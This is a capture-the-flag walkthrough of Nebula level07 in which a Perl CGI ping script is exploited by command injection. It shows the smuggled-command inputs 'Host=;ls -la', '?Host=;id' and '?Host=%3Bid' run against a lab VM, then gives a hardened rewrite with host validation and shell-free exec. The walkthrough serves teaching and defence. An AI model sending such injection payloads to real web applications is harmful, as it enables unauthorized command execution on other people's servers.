Nebula level07 Walkthrough

Nebula is a deliberately vulnerable virtual machine that covers a variety of weaknesses and vulnerabilities in a Linux system.

Description of level07
“The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07.”

Breakdown of the above program
use CGI qw{param};
Imports param from the CGI module, which parses the incoming CGI request.
sub ping
A ping subroutine that pings a host which is taken directly from the user.
ping(param("Host"));
The ping subroutine is then called with the value of the Host request parameter.

Inspecting /home/flag07

level07@nebula:/home/flag07$ ls
index.cgi thttpd.conf

Contents of thttpd.conf

The config file gives away some juicy information on lines 7 and 52. The web server is listening on port 7007 and is running as user flag07.

Inspecting the program
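In the Shell

Here index.cgi is run directly as level07. In the last command the ; is unquoted, so the login shell itself treats ls -la as a separate command and runs it after index.cgi exits, which is why the listing appears after the closing </html>.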

level07@nebula:/home/flag07$ ./index.cgi
Content-type: text/html
<html><head><title>Ping results</title></head><body><pre>Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M pmtudisc-hint] [-m mark] [-S sndbuf]
[-T tstamp-options] [-Q tos] [hop1 ...] destination
</pre></body></html>
level07@nebula:/home/flag07$ ./index.cgi Host=127.0.0.1
Content-type: text/html
<html><head><title>Ping results</title></head><body><pre>PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_req=1 ttl=64 time=0.014 ms
64 bytes from 127.0.0.1: icmp_req=2 ttl=64 time=0.021 ms
64 bytes from 127.0.0.1: icmp_req=3 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2000ms
rtt min/avg/max/mdev = 0.014/0.020/0.027/0.007 ms
</pre></body></html>
level07@nebula:/home/flag07$ ./index.cgi Host=;ls -la
Content-type: text/html
<html><head><title>Ping results</title></head><body><pre>Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface]
[-M pmtudisc-hint] [-m mark] [-S sndbuf]
[-T tstamp-options] [-Q tos] [hop1 ...] destination
</pre></body></html>total 10
drwxr-x--- 2 flag07 level07 102 2011-11-20 20:39 .
drwxr-xr-x 1 root root 180 2012-08-27 07:18 ..
-rw-r--r-- 1 flag07 flag07 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag07 flag07 3353 2011-05-18 02:54 .bashrc
-rwxr-xr-x 1 root root 368 2011-11-20 21:22 index.cgi
-rw-r--r-- 1 flag07 flag07 675 2011-05-18 02:54 .profile
-rw-r--r-- 1 root root 3719 2011-11-20 21:22 thttpd.conf

Game Plan
In the Browser
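URL encoding is key: the ; has to be sent as %3B, because CGI.pm treats a literal ; in the query string as a parameter separator, just like &.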
http://192.168.1.9:7007/index.cgi?Host=;id
http://192.168.1.9:7007/index.cgi?Host=%3Bid
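
The fix for what this level exercises is to validate Host and to run ping without a shell. The script below is an added example, not the level's index.cgi and not the author's code; valid_host, the hostname pattern and the --selftest switch are assumptions made for illustration, and the self-test inputs are constructed.

```perl
#!/usr/bin/perl
# Added example: a hardened CGI ping wrapper. Not Nebula's index.cgi.
use strict;
use warnings;
use CGI qw{param escapeHTML};   # assumes CGI.pm is installed

# Accept only a dotted-quad IPv4 address or a plain DNS hostname.
# Shell metacharacters, whitespace and a leading '-' never match.
sub valid_host {
    my ($host) = @_;
    return 0 unless defined $host && length($host) && length($host) <= 253;
    if ($host =~ /\A(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\z/) {
        my $bad = grep { $_ > 255 } $1, $2, $3, $4;   # count of out-of-range octets
        return $bad ? 0 : 1;
    }
    my $label = qr/[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?/;
    return $host =~ /\A$label(?:\.$label)*\z/ ? 1 : 0;
}

# List-form pipe open: ping is exec'd directly and $host is a single argv
# entry, so no shell ever parses it. '--' ends option parsing.
sub ping {
    my ($host) = @_;
    open(my $fh, '-|', 'ping', '-c', '3', '--', $host)
        or return "cannot run ping: $!\n";
    local $/;                     # slurp the whole output
    my $out = <$fh> // '';
    close $fh;
    return $out;
}

# Constructed inputs: run with --selftest to print the validator's
# decisions without sending any packets.
if (@ARGV && $ARGV[0] eq '--selftest') {
    for my $h ('127.0.0.1', 'example.org', ';id', '127.0.0.1;id', '-f', '999.1.1.1', '') {
        printf "%-16s %s\n", "[$h]", valid_host($h) ? 'accepted' : 'rejected';
    }
    exit 0;
}

my $host = param('Host');
my $body = valid_host($host) ? escapeHTML(ping($host)) : "Invalid host\n";
print "Content-type: text/html\n\n";
print "<html><head><title>Ping results</title></head><body><pre>";
print $body;
print "</pre></body></html>\n";
```

Validation and the shell-free exec are independent layers: either one alone stops the ; from being interpreted, and escapeHTML keeps ping's output from being rendered as markup.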

Happy Hacking !!!